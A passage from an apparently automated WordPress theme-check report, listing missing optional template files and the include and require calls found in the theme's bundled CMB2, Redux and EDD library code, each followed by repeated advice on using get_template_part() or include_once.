  7. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  8. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : theme-functions.php 14: require_once( $locale_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : init.php 87: require_once 'CMB2.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : test-cmb-types.php 3: require_once( 'cmb-tests-base.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : test-cmb-field.php 3: require_once( 'cmb-tests-base.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : test-cmb-core.php 3: require_once( 'cmb-tests-base.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : test-cmb-utils.php 3: require_once( 'cmb-tests-base.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : helper-functions.php 15: @include_once( $file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-redux-plugin.php 117: require_once( dirname( __FILE__ ) . '/ReduxCore/framework.php' );122: require_once( dirname( __FILE__ ) . '/sample/sample-config.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-tivwp-dm-controller.php 3: require_once 'class-tivwp-dm.php';4: require_once 'class-tivwp-dm-notices.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.redux-plugin.php 144: require_once( dirname( __FILE__ ) . '/ReduxCore/framework.php' );152: require_once( dirname( __FILE__ ) . '/ReduxCore/redux-extensions/config.php157: require_once( dirname( __FILE__ ) . '/sample/sample-config.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : loader.php 20: require_once( $class_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : extension_customizer.php 593: require_once( $class_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : extension_edd.php 75: include_once( dirname( __FILE__ ) . '/edd_license/EDD_SL_Theme_Updater.php'103: include_once( dirname( __FILE__ ) . '/edd_license/EDD_SL_Plugin_Updater.php If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : EDD_License_Handler.php 60: require_once 'EDD_SL_Plugin_Updater.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : enqueue.php 264: require_once( $class_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.redux_sass.php 140: require( 'scssphp/scss.inc.php' );191: require( 'scssphp/scss.inc.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.redux_functions.php 91: require_once( ABSPATH . '/wp-admin/includes/file.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.redux_filesystem.php 79: require_once( ABSPATH . '/wp-admin/includes/template.php' );80: require_once( ABSPATH . '/wp-admin/includes/file.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : sysinfo.php 54: require_once 'browser.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : tracking.php 280: require_once( ABSPATH . 'wp-admin/includes/admin.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.redux_helpers.php 78: require_once( ABSPATH . 'wp-admin/includes/admin.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : scss.inc.php 2816: If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : field_raw_align.php 31: include( $this->field['include'] ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : field_group.php 175: require_once( $class_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : field_raw.php 52: require_once( $this->field['include'] ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : field_select.php 57: require_once( $icons_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : field_button_set.php 46: * ['format'] string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : framework.php 37: require_once( dirname( __FILE__ ) . '/inc/class.redux_instances.php' );38: require_once( dirname( __FILE__ ) . '/inc/lib.redux_instances.php' );50: require_once( dirname( __FILE__ ) . '/inc/class.redux_helpers.php' );53: require_once( dirname( __FILE__ ) . '/inc/class.redux_functions.php' );54: require_once( dirname( __FILE__ ) . '/inc/class.p.php' );56: require_once( dirname( __FILE__ ) . '/inc/class.redux_filesystem.php' );59: require_once( dirname( __FILE__ ) . '/inc/class.redux_themecheck.php' );61: //require_once( dirname( __FILE__ ) . '/inc/class.redux_sass.php' );331: // require_once( dirname( __FILE__ ) . '/inc/welcome.php' );366: require_once( self::$_dir . 'inc/debug.php' );408: require_once( self::$_dir . 'inc/import_export.php' );640: require_once( dirname( __FILE__ ) . '/inc/tracking.php' );1551: require_once( $class_file );1627: include_once('core/enqueue.php');1925: include( ABSPATH . 'wp-includes/pluggable.php' );2371: require_once( $class_file );2775: require_once( $class_file );3330: require_once 'inc/sysinfo.php';3563: require_once( $class_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : redux-framework.php 35: require_once( plugin_dir_path( __FILE__ ) . 'class.redux-plugin.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : theme-options.php 85: require_once( ABSPATH .'/wp-admin/includes/file.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : sample-config.php 85: require_once( ABSPATH .'/wp-admin/includes/file.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes